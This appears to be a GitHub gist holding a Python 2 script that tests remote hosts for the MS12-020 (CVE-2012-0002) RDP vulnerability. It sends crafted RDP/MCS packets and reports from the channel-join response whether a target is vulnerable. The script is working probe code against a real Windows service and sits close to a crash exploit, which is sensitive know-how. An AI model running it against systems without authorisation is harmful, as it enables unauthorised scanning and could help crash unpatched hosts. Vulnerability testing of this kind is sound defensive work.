MS12-020/CVE-2012-0002 Vulnerability Tester
| #!/usr/bin/env python | |
| """ | |
| MS12-020/CVE-2012-0002 Vulnerability Tester | |
| based on sleepya's version @ http://pastebin.com/Ks2PhKb4 | |
| """ | |
| import socket | |
| import struct | |
| import sys | |
| from binascii import hexlify, unhexlify | |
| def exploit(host, port): | |
| # See http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx | |
| connection_request = unhexlify(''.join([ | |
| "0300", # TPKT Header version 03, reserved 0 | |
| "0013", # Length | |
| "0e", # X.224 Data TPDU length | |
| "e0", # X.224 Type (Connection request) | |
| "0000", # dst reference | |
| "0000", # src reference | |
| "00", # class and options | |
| "01", # RDP Negotiation Message | |
| "00", # flags | |
| "0800", # RDP Negotiation Request Length | |
| "00000000" # RDP Negotiation Request | |
| ])) | |
| initial_pdu = unhexlify(''.join([ | |
| "03000065", # TPKT Header | |
| "02f080", # Data TPDU, EOT | |
| "7f655b", # Connect-Initial | |
| "040101", # callingDomainSelector | |
| "040101", # calledDomainSelector | |
| "0101ff", # upwardFlag | |
| "3019", # targetParams + size (25 bytes) | |
| "020122", # maxChannelIds | |
| "020120", # maxUserIds | |
| "020100", # maxTokenIds | |
| "020101", # numPriorities | |
| "020100", # minThroughput | |
| "020101", # maxHeight | |
| "0202ffff", # maxMCSPDUSize | |
| "020102", # protocolVersion | |
| "3018", # minParams + size (24 bytes) | |
| "020101", # maxChannelIds | |
| "020101", # maxUserIds | |
| "020101", # maxTokenIds | |
| "020101", # numPriorities | |
| "020100", # minThroughput | |
| "020101", # maxHeight | |
| "0201ff", # maxMCSPDUSize | |
| "020102", # protocolVersion | |
| "3019", # maxParams + size (25 bytes) | |
| "0201ff", # maxChannelIds | |
| "0201ff", # maxUserIds | |
| "0201ff", # maxTokenIds | |
| "020101", # numPriorities | |
| "020100", # minThroughput | |
| "020101", # maxHeight | |
| "0202ffff", # maxMCSPDUSize | |
| "020102", # protocolVersion | |
| "0400", # userData | |
| ])) | |
| user_request = unhexlify(''.join([ | |
| "0300", # header | |
| "0008", # length | |
| "02f080", # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT) | |
| "28", # PER encoded PDU contents | |
| ])) | |
| channel_join_request = unhexlify("0300000c02f08038") | |
| skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| skt.settimeout(10) | |
| skt.connect((host, port)) | |
| skt.send(connection_request) | |
| data = skt.recv(8192) | |
| if data != unhexlify("0300000b06d00000123400") \ | |
| and data != unhexlify("030000130ed000001234000201080000000000"): | |
| print "ERROR: This isn't RDP" | |
| raise SystemExit(1) | |
| skt.send(initial_pdu) | |
| # Send attach user request | |
| skt.send(user_request) | |
| data = skt.recv(8192) | |
| user1 = data[9:11] | |
| # Send another attach user request | |
| skt.send(user_request) | |
| data = skt.recv(8192) | |
| user2_int = int(hexlify(data[9:11]), base=16) | |
| user2 = struct.pack('!H', user2_int + 1001) | |
| # Send channel join request | |
| skt.send(channel_join_request + user1 + user2) | |
| data = skt.recv(8192) | |
| if data[7:9] == "\x3e\x00": | |
| """ 0x3e00 indicates a successful join; this service is vulnerable """ | |
| print "This device is vulnerable" | |
| # Complete request to prevent BSOD | |
| skt.send(channel_join_request + struct.pack('!H', user2_int) + user2) | |
| data = skt.recv(8192) | |
| else: | |
| # Patched | |
| print "This device is not vulnerable to MS12-020." | |
| skt.close() | |
| if __name__ == '__main__': | |
| exploit(sys.argv[1], int(sys.argv[2])) | |
| # vim: set expandtab ts=2 sw=2: |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment